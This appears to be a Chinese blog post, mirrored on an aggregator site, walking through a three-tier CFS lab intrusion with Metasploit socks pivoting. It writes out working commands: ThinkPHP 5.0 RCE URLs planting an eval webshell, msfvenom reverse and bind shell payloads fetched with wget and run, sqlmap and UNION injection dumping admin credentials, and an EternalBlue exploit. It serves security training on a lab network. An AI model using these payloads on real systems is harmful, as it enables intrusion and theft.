码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)


    前言

    作者简介:不知名白帽,网络安全学习者。

    博客主页:https://blog.csdn.net/m0_63127854?type=blog

    内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

    网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

    CFS三层靶场搭建:

    内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSDN博客

    目录

    Socks代理实战-MSF

    01渗透场景(网络拓扑)

    02测试Target1

    02.1信息收集

    02.2分析利用(21/22/3306/8888)

    02.3分析利用(80)

    02.4主机信息收集

    02.5建立Socks代理

    03测试Target2

    03.1开启代理

    03.2信息收集

    03.3分析利用

    03.4主机信息收集

    03.5建立隧道

    04测试Target3

    04.1信息收集

    04.2分析利用


    借鉴文章链接:

    CFS三层靶机搭建及其内网渗透_ZredamanJ的博客-CSDN博客_cfs三层

    代理技术应用之三层内网漫游 - FreeBuf网络安全行业门户

    CFS三层靶机搭建及其内网渗透附靶场环境 - 安全客,安全资讯平台

    Socks代理实战-MSF

    01渗透场景(网络拓扑)

    ​

    02测试Target1

    02.1信息收集

    nmap -sS -v -A 192.168.1.128

    nmap -A -v -T4 192.168.1.128

    ​

    02.2分析利用(21/22/3306/8888)

    21/22端口:弱口令爆破

    1. hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ftp
    2. hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ssh

    3306端口:不允许远程IP链接

    8888端口:宝塔登录页面

    02.3分析利用(80)

    80端口:Thinkphp v5.0

    存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell

    /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


    ​

    /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

    ​

    /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd'])?>

    ​

    蚁剑连接

    发现两个flag

    02.4主机信息收集

    ifconfig

    发现192.168.22.0/24内网网段

    发现192.168.22.129存活主机

    02.5建立Socks代理

    msfvenom生成payload

    查找可用的payload

    msfvenom -l payload | grep "linux/x64" | awk "{print $l}"

    1. msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >6666.elf
    2. msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f elf >6666.elf
    3. msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.130 lport=6666 -f elf >6666.php

    上传到target1的tmp目录下

    或者开启http服务用wgett来下载

    python -m http.server(默认端口为8000)

    wget http://192.168.1.130(kali的ip):8000/6666.elf

    kali中配置运行监听模块

    1. use exploit/multi/handler
    2. set payload linux/x64/meterpreter/reverse_tcp
    3. set lhost 192.168.1.130
    4. set lport 6666
    5. exploit

    1. chmod 777 6666.elf
    2. ./6666.elf

    反弹shell

    获得target1的meterpreter shell后,添加到192.168.22网段的路由

    1. run autoroute -s 192.168.22.0/24 
    2. run autoroute -p

    使用msf的socks5模块建立socks服务,并配置prochains代理

    search socks

    1. use auxiliary/server/socks_proxy
    2. set SRVHOST 0.0.0.0
    3. set SRVPORT 1080
    4. exploit

    vim /etc/proxychains4.conf

    socks5 192.168.1.130 1080

    需要加上刚刚配置好的代理文件才能进行扫描

    proxychains4 nmap -Pn -sT 192.168.22.128

    03测试Target2

    03.1开启代理

    火狐浏览器插件foxyproxy

    配置代理

    访问192.168.22.128

    03.2信息收集

    proxychains4 nmap -Pn -sT 192.168.22.128

    03.3分析利用

    翻看一下robots.txt

    找到后台登录地址,有验证码先不尝试爆破

    查看源代码找到提示,存在sql注入

    1. proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” --dbs
    2. proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms –tables
    3. proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
    4. proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump
    5. 注意:socks5不稳定,以用sqlmap跑就会断开

    手注一下

    http://192.168.22.128/index.php?r=vul&keyword=1' union select group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bage_admin-- -

    登录后台(admin/123qwe)

    发现模板中存在index.php文件,可以写入一句话木马

     

    来到标签页,可以看到一句话生效了,接下里在SocksCap64中打开蚁剑,利用蚁剑连接,注意SocksCap设置好代理

    03.4主机信息收集

    03.5建立隧道

    生成正向后门

    msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=7777 -f elf > 7777.elf

    msf正向连接

    1. use exploit/multi/handler
    2. set payload linux/x64/meterpreter/bind_tcp
    3. set rhost 192.168.22.128
    4. set LPORT 7777
    5. exploit

    开启http服务,下载7777.elf文件

    提权并运行7777.elf

    1. chomd 777 7777.elf
    2. ./7777.elf

    反弹shell

    添加路由

    1. run autoroute -s 192.168.33.0/24
    2. run autoroute -p

    04测试Target3

    04.1信息收集

    proxychains4 nmap -Pn -sT 192.168.33.33

    04.2分析利用

    开启445、3389端口,我们可以用永恒之蓝进行攻击

    1. use exploit/windows/smb/ms17_010_psexec
    2. set payload windows/meterpreter/bind_tcp
    3. set RHOST 192.168.33.33
    4. exploit

    1. shell
    2. net user

     

    1. cd /
    2. dir /S /B *flag*
    3. type C:\Windows\System32\config\flag.txt
    4. # /B 显示文件夹或文件的名字
    5. # /S 显示指定目录和所有子目录中的文件

    linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)

    chcp 65001

    找到flag了

  • 相关阅读:
    【算法】常见位运算总结
    Python —— 深拷贝&浅拷贝
    IPhone无法usb线共享网络给windows电脑的常规解决办法
    利用zk实现分布式锁&zk数据同步原理
    大数据_湖仓一体:下一代存储解决方案
    保研笔记四 软件工程与计算卷二(8-12章)
    P2558 [AHOI2002] 网络传输提交,位运算,高精度
    从数据、产品、管理的视角探讨MES管理系统
    Redis 性能影响因素分析
    【无标题】
  • 原文地址:https://blog.csdn.net/m0_63127854/article/details/126913762
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号